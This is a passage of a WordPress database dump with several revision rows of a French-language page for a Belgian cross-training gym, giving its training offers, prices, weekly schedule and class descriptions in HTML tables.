(115, 1, '2013-06-16 14:20:55', '2013-06-16 14:20:55', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n\r\n&nbsp;\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color:#cccccc;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color:#eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color:#cccccc;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n- Team Training (réservation obligatoire)\r\n\r\nDu Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\n\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00\r\n\r\n&nbsp;\r\n\r\n- Personal et Duo Training (sur rendez-vous)\r\n\r\nTous les jours du lundi au dimanche.\r\n\r\n&nbsp;\r\n\r\nLes cours ?\r\n\r\n- <span style=\"text-decoration: underline;\">TRX</span> : entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n- <span style=\"text-decoration: underline;\">Circuit GLFE</span> : travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n- <span style=\"text-decoration: underline;\">RIP-KETTLE</span> : alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n- <span style=\"text-decoration: underline;\">CARDIO</span> : pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:20:55', '2013-06-16 14:20:55', '', 11, 'http://www.crosstrainingcenter.be/?p=115', 0, 'revision', '', 0),
(116, 1, '2013-06-16 14:24:10', '2013-06-16 14:24:10', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n\r\n&nbsp;\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #cccccc;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #cccccc;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #cccccc;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2>Les cours ?</h2>\r\n- <span style=\"text-decoration: underline;\">TRX</span> : entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n- <span style=\"text-decoration: underline;\">Circuit GLFE</span> : travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n- <span style=\"text-decoration: underline;\">RIP-KETTLE</span> : alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n- <span style=\"text-decoration: underline;\">CARDIO</span> : pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:24:10', '2013-06-16 14:24:10', '', 11, 'http://www.crosstrainingcenter.be/?p=116', 0, 'revision', '', 0),
(117, 1, '2013-06-16 14:24:59', '2013-06-16 14:24:59', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n\r\n&nbsp;\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #cccccc;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #cccccc;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #cccccc;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>Les cours ?</h2>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:24:59', '2013-06-16 14:24:59', '', 11, 'http://www.crosstrainingcenter.be/?p=117', 0, 'revision', '', 0),
(118, 1, '2013-06-16 14:25:45', '2013-06-16 14:25:45', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n\r\n&nbsp;\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #ebebeb;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #ebebeb;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>Les cours ?</h2>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:25:45', '2013-06-16 14:25:45', '', 11, 'http://www.crosstrainingcenter.be/?p=118', 0, 'revision', '', 0);
INSERT INTO `www_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(119, 1, '2013-06-16 14:26:21', '2013-06-16 14:26:21', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n\r\n&nbsp;\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fefefe;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fefefe;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>Les cours ?</h2>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:26:21', '2013-06-16 14:26:21', '', 11, 'http://www.crosstrainingcenter.be/?p=119', 0, 'revision', '', 0),
(120, 1, '2013-06-16 14:26:44', '2013-06-16 14:26:44', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n\r\n&nbsp;\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #f0f0f0;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #f0f0f0;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fefefe;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>Les cours ?</h2>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:26:44', '2013-06-16 14:26:44', '', 11, 'http://www.crosstrainingcenter.be/?p=120', 0, 'revision', '', 0),
(121, 1, '2013-06-16 14:27:41', '2013-06-16 14:27:41', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n\r\n&nbsp;\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #f5f5f5;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #f5f5f5;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>Les cours ?</h2>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:27:41', '2013-06-16 14:27:41', '', 11, 'http://www.crosstrainingcenter.be/?p=121', 0, 'revision', '', 0),
(122, 1, '2013-06-16 14:27:58', '2013-06-16 14:27:58', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n\r\n&nbsp;\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #f5f5f5;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>Les cours ?</h2>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:27:58', '2013-06-16 14:27:58', '', 11, 'http://www.crosstrainingcenter.be/?p=122', 0, 'revision', '', 0),
(123, 1, '2013-06-16 14:28:10', '2013-06-16 14:28:10', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n\r\n&nbsp;\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 